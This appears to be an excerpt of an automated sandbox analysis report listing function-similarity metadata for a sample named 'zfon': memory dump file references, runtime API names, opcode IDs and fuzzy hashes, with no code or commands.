                                                                                                                                                                            • Instruction Fuzzy Hash: E8027B63B58A8695EF60EB25D4803ADA7B2FB88BD4F845835DA4D07B99DF3CD448C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                                            • Opcode ID: 8492ec3cbb052648847725c6eac285aad335bf2eec9658cc8bf6bb9f2bd8324d
                                                                                                                                                                            • Instruction ID: ffb2490716c951fc864415413d6fed245970de8dbe014ec0c484ff056431b8dc
                                                                                                                                                                            • Opcode Fuzzy Hash: 8492ec3cbb052648847725c6eac285aad335bf2eec9658cc8bf6bb9f2bd8324d
                                                                                                                                                                            • Instruction Fuzzy Hash: 7FC17773B48B8682EF20DB69D4402ADA7B2FB44B98B998935CE4D57B94DF38D415C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: fgetc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2807381905-0
                                                                                                                                                                            • Opcode ID: 37ef44d73613fa637cd5931db9e282469f942bc8d6bbf53949da0148d4e9ee1e
                                                                                                                                                                            • Instruction ID: a8a01fc6fa036a65b40ae6045e23f70eb83a9263278a01b25e798e9a7b028b67
                                                                                                                                                                            • Opcode Fuzzy Hash: 37ef44d73613fa637cd5931db9e282469f942bc8d6bbf53949da0148d4e9ee1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 56818DB6604A46C8EB10CF39C4943AD33A1FB48B98F906276EA5E97B99DF38D454C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                            • Opcode ID: 2525277bc558616bb67a30a3331fd7d08be3bd4bec0defa2e2d618cc86f76eb6
                                                                                                                                                                            • Instruction ID: 6abba9acd11e00a38479b5ddf9d8777b511684d901eab5e69f697964b1d07488
                                                                                                                                                                            • Opcode Fuzzy Hash: 2525277bc558616bb67a30a3331fd7d08be3bd4bec0defa2e2d618cc86f76eb6
                                                                                                                                                                            • Instruction Fuzzy Hash: FD7179BAA1868289E701CF74D8803BE37A1BB44744F62A031EA0D677A5DF3DE456CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2704743706-0
                                                                                                                                                                            • Opcode ID: fbe8a88868b665d4309cbe054d2a8286b12580c86b6c0d59b7eba0ca7af31215
                                                                                                                                                                            • Instruction ID: ae8050a597b1bda7bd957d52cb5657fe88fd14b464b733b50a6c282329471c31
                                                                                                                                                                            • Opcode Fuzzy Hash: fbe8a88868b665d4309cbe054d2a8286b12580c86b6c0d59b7eba0ca7af31215
                                                                                                                                                                            • Instruction Fuzzy Hash: 6541EFAAF08E028AF3259F75E4012BB6361AF48B44F916271DE0D77395EF3CA5178B10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2704743706-0
                                                                                                                                                                            • Opcode ID: 45cdee77e7545dfb4ac0ef30fcf84e3151481f7f1e52e181642e42e439e35c8f
                                                                                                                                                                            • Instruction ID: e308a8472e308abb8865c54e8472eb6bfe70e1eda2c2b2a6ee2ca2dd07beb7a4
                                                                                                                                                                            • Opcode Fuzzy Hash: 45cdee77e7545dfb4ac0ef30fcf84e3151481f7f1e52e181642e42e439e35c8f
                                                                                                                                                                            • Instruction Fuzzy Hash: BC419EAAB08A0289F3119F75E4412BBA361AF49B84FD16231DE4D37795DF3CA45A8B10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2704743706-0
                                                                                                                                                                            • Opcode ID: 46f50b73c82e49e8af2879a4f3962c67271bb0fc27e978c102ab5c68021049db
                                                                                                                                                                            • Instruction ID: 4af4b2552789917b13120cf316aad5af13348967488d7e18a892f014b97a8cac
                                                                                                                                                                            • Opcode Fuzzy Hash: 46f50b73c82e49e8af2879a4f3962c67271bb0fc27e978c102ab5c68021049db
                                                                                                                                                                            • Instruction Fuzzy Hash: F44164AAA0C64596F3119F3AD4812BB6350AF48740F94E631EA4D367B5DF3CE5168E10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741236498-0
                                                                                                                                                                            • Opcode ID: 080442bbed9b7baa97cf181390621352c52238d50ff0bc3b3759bb2dfd2316c3
                                                                                                                                                                            • Instruction ID: 140d3755df33427b92168b7f31454f4c06a2d475a1f4cc1a09620eb769a3a43c
                                                                                                                                                                            • Opcode Fuzzy Hash: 080442bbed9b7baa97cf181390621352c52238d50ff0bc3b3759bb2dfd2316c3
                                                                                                                                                                            • Instruction Fuzzy Hash: C631C46AB2A75251EB15CF36D80466A23A0FF0CBD0B6AA531DE1D13390EE7DD846C700
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __acrt_iob_funccalloc$Mtx_unlock_beginthreadexabortfputcfputs
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3995598257-0
                                                                                                                                                                            • Opcode ID: 6ad6c8eed9cc5b4294a11b96ced4649fbf6b7dbd8c716d51d6e433a25b8b480f
                                                                                                                                                                            • Instruction ID: 5c9718ab396cb2a73e9c594c9f64e8ae1f7cec88d1880056570896e896affbda
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ad6c8eed9cc5b4294a11b96ced4649fbf6b7dbd8c716d51d6e433a25b8b480f
                                                                                                                                                                            • Instruction Fuzzy Hash: 922151A9A14A118AFB00AF31D8542FA2364FF4CB88F446035FE0E67B5ADE38D494C790
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Once$ExecuteInit__crtterminate$ErrorExceptionLastSystem_errorSystem_error::_Throw_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3077141932-0
                                                                                                                                                                            • Opcode ID: 292ba9b08f1b456e8eb1e10f3c91b04e86b57f13cec82466bb27a72e0fb057f3
                                                                                                                                                                            • Instruction ID: abac515a6c521946621e1b46f895149c81e8e38ea30f9c81ae3c3b8dedf74f24
                                                                                                                                                                            • Opcode Fuzzy Hash: 292ba9b08f1b456e8eb1e10f3c91b04e86b57f13cec82466bb27a72e0fb057f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21B6A9908A46C2E7109F34E5000AB63A0FF69B94F547231EA9C77695DF3CD552CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow__std_exception_copy$std::invalid_argument::invalid_argument$std::regex_error::regex_error
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2225372811-0
                                                                                                                                                                            • Opcode ID: 579caac49531870bd7b2df6b8c7ac96cef54dbc44b83102e448678832d7dfad5
                                                                                                                                                                            • Instruction ID: 8643b526e148b47f8d16b2eaf0cf9a905e0f8376eaae8b2e7367e12b9372376e
                                                                                                                                                                            • Opcode Fuzzy Hash: 579caac49531870bd7b2df6b8c7ac96cef54dbc44b83102e448678832d7dfad5
                                                                                                                                                                            • Instruction Fuzzy Hash: 85F012A6A1844691DB14AF30D4650AB5330FBA4384F906176E25E6696ADD6CD70ACF10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __pctype_func$___lc_codepage_func___lc_locale_name_func_wcsdupcalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 490008815-0
                                                                                                                                                                            • Opcode ID: c26570a5175e310c7c67cec82136f633dba3ba5588f44644c2c5e5ceca30bf29
                                                                                                                                                                            • Instruction ID: e56643a61a6b00a81c355c59770aeaae7e5a9ac8e9caa3cdaed292447fcd7918
                                                                                                                                                                            • Opcode Fuzzy Hash: c26570a5175e310c7c67cec82136f633dba3ba5588f44644c2c5e5ceca30bf29
                                                                                                                                                                            • Instruction Fuzzy Hash: 52211BA6D08F8587F7018F38D55527933A0FBA9F48F15A264CE8C16222EF39E5E5C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 88f2ef690c4a8c45f9e59a1200a3e63dedbb3740fc12a1e5506eac693a5bd548
                                                                                                                                                                            • Instruction ID: 70039ba8ace1c4145fcc2735fd96099d6c679dad0c92b90b2e4933c0fbe64200
                                                                                                                                                                            • Opcode Fuzzy Hash: 88f2ef690c4a8c45f9e59a1200a3e63dedbb3740fc12a1e5506eac693a5bd548
                                                                                                                                                                            • Instruction Fuzzy Hash: FBF06D66E0A64350ED29F778964933895B2AF547B0FC00734C57D023D4FF2C64854230
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 5b714251bbdd11423a55c0776489f6b684c1a57d624a24fc72f26bda6c2bdede
                                                                                                                                                                            • Instruction ID: 1ed1bdd7ad875f477254af8e3c6015837389a9d602867ba690ede4f061141fab
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b714251bbdd11423a55c0776489f6b684c1a57d624a24fc72f26bda6c2bdede
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F08CE6E0A54350FD39B374A58A33891B6EF54BB0FC48B34C57E056D4FE1C24854220
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 933c6945ac0c1734e21877da7a05e15318510cce0e034cb2454857b8da2631b6
                                                                                                                                                                            • Instruction ID: ea787252e2df2eac8a86cb4b18871141f16c0612da52a03e87ecf9aa6f7a56b7
                                                                                                                                                                            • Opcode Fuzzy Hash: 933c6945ac0c1734e21877da7a05e15318510cce0e034cb2454857b8da2631b6
                                                                                                                                                                            • Instruction Fuzzy Hash: FE0181A5F0AA4351FD78F77AB549338A1B2AF44B60FC00634C56D82BD4FE2C64868223
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
